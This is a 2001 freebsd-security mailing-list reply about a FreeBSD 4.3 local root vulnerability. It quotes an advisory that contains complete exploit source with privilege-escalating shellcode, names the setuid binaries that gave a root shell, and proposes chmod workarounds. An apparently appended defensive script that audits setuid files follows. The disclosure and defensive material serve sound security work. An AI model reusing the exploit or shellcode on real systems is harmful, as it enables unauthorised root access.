From owner-freebsd-security Wed Jul 11 01:20:03 2001
Date: Wed, 11 Jul 2001 12:19:39 +0400 (MSD)
From: Seva Gluschenko <gvs@rinet.ru>
To: Bug Track
Subject: Re: FreeBSD 4.3 local root
In-Reply-To: <3B4B0E7B.1492C76A@guninski.com>
Message-ID: <20010711121224.J96652-100000@localhost>

Message from Georgi Guninski at Jul 10 17:17 in parts:

GG> Systems affected:
GG> FreeBSD 4.3 and probably earlier versions. Confirmed for 3-STABLE
GG> Exploit:
GG>
GG> Examine the source and don't send me mail if you get SEGV.

Well, actually, your native exploit doesn't work due to a little
"mistake" inside ;) But it was easy to correct %|

Well, after a bunch of tests I've found only two suids which gave me a
suid shell:

/usr/bin/passwd
/usr/local/bin/ssh1

A lot of others, including login/rlogin, gave me either a non-suid shell
or just a coredump (which is worse, of course). So, a quick workaround
should be

chmod o-rx /usr/bin/passwd
chmod u-s /usr/local/bin/ssh1

Of course, it does NOT save the system in general but can significantly
decrease the first-step risk.

GG> http://www.guninski.com/vvfreebsd.c
GG>
GG> -------------vvfreebsd.c----------------------
GG>
GG> /*
GG> FreeBSD 4.3 local root exploit using shared signals.
GG> Written by Georgi Guninski http://www.guninski.com
GG> */
GG>
GG> #include
GG> #include
GG> #include
GG> int vv1;
GG>
GG> #define MYSIG SIGINT
GG>
GG>
GG> //exec "/tmp/sh", shellcode gotten from the internet and modified
GG> unsigned char bsdshell[] = "\x90\x90\x90\x90\x90\x90\x90\x90"
GG> "\x31\xc0\x50\x50\xb0\xb7\xcd\x80"
GG> "\x31\xc0\x50\x50\xb0\x17\xcd\x80"
GG> "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
GG> "\x74\x6d\x70\x89\xe3\x50\x53\x50\x54\x53"
GG> "\xb0\x3b\x50\xcd\x80\x90\x90\x90";
GG>
GG> typedef (*PROG)();
GG> extern char **environ;
GG>
GG> int main(int ac,char **av)
GG> {
GG>     int pid;
GG>     //(*(PROG)bsdshell)();
GG>     if(!(vv1=getenv("vv")))
GG>     {
GG>         setenv("vv",bsdshell,1);
GG>         if(!execle(av[0],"vv",NULL,environ))
GG>         {
GG>             perror("weird exec");
GG>             exit(1);
GG>         }
GG>     }
GG>
GG>     printf("vvfreebsd. Written by Georgi Guninski\n");
GG>     printf("shall jump to %x\n",vv1);
GG>
GG>     if(!(pid=rfork(RFPROC|RFSIGSHARE)))
GG>     {
GG>         printf("child=%d\n",getpid());
GG>         // /usr/bin/login and rlogin work for me. ping gives nonsuid shell
GG>         // if(!execl("/usr/bin/rlogin","rlogin","localhost",0))
GG>         if(!execl("/usr/bin/login","login",0))
GG>         {
GG>             perror("exec setuid failed");
GG>             exit(2);
GG>         };
GG>     }
GG>     sleep(2);
GG>     signal(MYSIG,(sig_t)vv1);
GG>     sleep(2);
GG>     kill(pid,MYSIG);
GG>     printf("done\n");
GG>     while(42);
GG> }
GG>
GG>
GG> ----------------------------------------------
GG>
GG> Workaround/Solution:
GG> As far as I know patches for this problem are committed for both
GG> -current and -stable.
GG> From "CVS log for src/sys/kern/kern_exec.c"
GG> [MFC: do not share sigs after an exec]
GG> The main diff seems to be at:
GG> http://www.freebsd.org/cgi/cvsweb.cgi/src/sys/kern/kern_exec.c.diff?r1=1.107.2.7&r2=1.107.2.8&f=h
GG>
GG> Vendor status:
GG> FreeBSD was informed on 2 July 2001 (sent them broken attachment on 1 July).
GG>
GG> Some comparison of vendor response times from my personal experience:
GG> FreeBSD seem to have fixed this in 7 days.
GG> OpenBSD fixed my previous advisory in 6 days.
GG> Microsoft are much slower.
GG>
GG> Regards,
GG> Georgi Guninski
GG> http://www.guninski.com

SY, Seva Gluschenko, just stranger on The Road.   | http://gvs.rinet.ru/
Cronyx Plus / RiNet network administrator.        | GVS-RIPE | GVS3-RIPN

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
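The workaround in the reply above (chmod o-rx on one setuid binary, chmod u-s on another) is a per-file change, and the issue turns on which setuid binaries an unprivileged user can still exec. The script below is an added example, not part of the thread and not FreeBSD's or either author's code: it enumerates setuid files under a directory, flags the ones that are still world-executable (the set the workaround shrinks), and wraps the two chmod forms as functions so the effect can be checked before and after. The directory to scan and the file names used are assumptions; it uses only POSIX sh, find and ls, so it runs on FreeBSD and Linux alike.

```shell
#!/bin/sh
# Setuid exposure audit for the workaround discussed in the thread.
# Added example; assumes nothing about the host beyond POSIX sh, find and ls.

# Print every setuid file under directory $1, one path per line.
list_setuid() {
    find "$1" -type f -perm -4000 2>/dev/null | sort
}

# Succeed if file $1 has the setuid bit.
is_setuid() {
    [ -u "$1" ]
}

# Succeed if file $1 is executable by "other" (10th column of ls -ld).
is_world_exec() {
    case "$(ls -ld "$1" 2>/dev/null)" in
        ?????????x*) return 0 ;;
        *)           return 1 ;;
    esac
}

# Print the setuid files under $1 that any local user can still exec.
# These are the candidates the reply's first chmod form is aimed at.
report_exposed() {
    list_setuid "$1" | while IFS= read -r f; do
        if is_world_exec "$f"; then
            printf '%s\n' "$f"
        fi
    done
}

# First workaround form from the reply: keep setuid, but stop "other"
# from reading or executing the file (users outside its group lose access).
restrict_to_owner() {
    chmod o-rx "$1"
}

# Second workaround form from the reply: drop the setuid bit entirely.
drop_setuid() {
    chmod u-s "$1"
}

# Usage: sh audit_setuid.sh /usr/bin   (prints world-executable setuid files)
if [ "$#" -ge 1 ]; then
    report_exposed "$1"
fi
```

Run it with a directory argument to get the list; the functions only report until restrict_to_owner or drop_setuid is called explicitly. Note that applying chmod o-rx to /usr/bin/passwd, as the reply proposes, also means users outside the file's group can no longer run passwd at all, which is why the reply calls it a first-step risk reduction rather than a fix.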